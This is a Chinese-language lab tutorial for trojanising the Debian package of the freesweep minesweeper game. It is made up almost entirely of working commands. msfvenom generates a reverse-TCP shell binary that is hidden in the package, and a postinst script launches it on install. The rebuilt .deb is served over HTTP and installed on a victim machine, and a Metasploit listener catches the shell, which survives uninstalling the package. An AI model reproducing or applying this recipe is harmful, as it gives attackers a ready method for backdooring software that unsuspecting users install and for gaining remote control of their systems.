使用MSF-msfvenom制作恶意 deb 软件包来触发后门
实验环境
- Kali Linux 2019.1a
- Kali Linux 2020.4
1.制作恶意软件包
制作恶意软件包使用 --download-only
方式下载软件包不进行安装
注:freeweep
root@fengzilin53:~# apt --download-only install -y freesweep
root@fengzilin53:~# mv /var/cache/apt/archives/freesweep_1.0.1-2_amd64.deb /root //将freesweep 移动到 /root下
root@fengzilin53:~# dpkg -x freesweep_1.0.1-2_amd64.deb free //解压到 free目录
root@fengzilin53:~# msfvenom -a x64 --platform linux -p linux/x64/shell/reverse_tcp LHOST=192.168.37.138 LPORT=4444 -b "\x00" -i 10 -f elf -o /root/free/usr/games/freesweep_sources
扩展:生成软件包时无论时 payload 的和软件包信息都需要选择能够在目标操作系统上执行的,创建软件包信息目录
root@fengzilin53:~# mkdir free/DEBIAN && cd free/DEBIAN
root@fengzilin53:~/free/DEBIAN# tee /root/free/DEBIAN/control <<'EOF'
Package: freesweep
Version: 1.0.1-1
Section: Games and Amusement
Priority: optional
Architecture: amd64
Maintainer: Ubuntu MOTU Developers (ubuntu-motu@lists.ubuntu.com)
Description: a text-based minesweeper Freesweep is an implementation of the popular minesweeper game, where one tries to find all the mines without igniting any, based on hints given by the computer. Unlike most implementations of this game, Freesweep works in any visual text display - in Linux console, in an xterm, and in most text-based terminals currently in use.
EOF
创建 deb 软件包 ,安装 后脚本文件,来加载 后门
root@fengzilin53:~# tee /root/free/DEBIAN/postinst <<'EOF'
#!/bin/bash
sudo chmod 2755 /usr/games/freesweep_sources
sudo /usr/games/freesweep_sources &
EOF
sudo /usr/games/freesweep_sources &
是我们要执行的恶意代码 &是将命令放到后台运行
给脚本添加执行权限,并构建新的deb 安装包
root@fengzilin53:~# cd
root@fengzilin53:~# chmod 755 /root/free/DEBIAN/postinst
root@fengzilin53:~# dpkg-deb --build /root/free/
root@fengzilin53:~# ls free.deb
新打开一个终端 生成 MSF监听
msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload linux/x64/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set LHOST 192.168.37.138
msf5 exploit(multi/handler) > set LPORT 4444
msf5 exploit(multi/handler) > run
将deb 包拷贝到网站根目录下
root@fengzilin53:~# cp /root/free.deb /var/www/html/
打开 kali Linux 2020.4 下载deb 包root
└─# wget http://192.168.37.138/free.deb
安装 free.deb 包
└─# dpkg -i free.deb
返回kali 终端 发现已经获取shell
kali 2020.4 卸载 payload的依旧正常运行
dpkg -r freesweep
pwd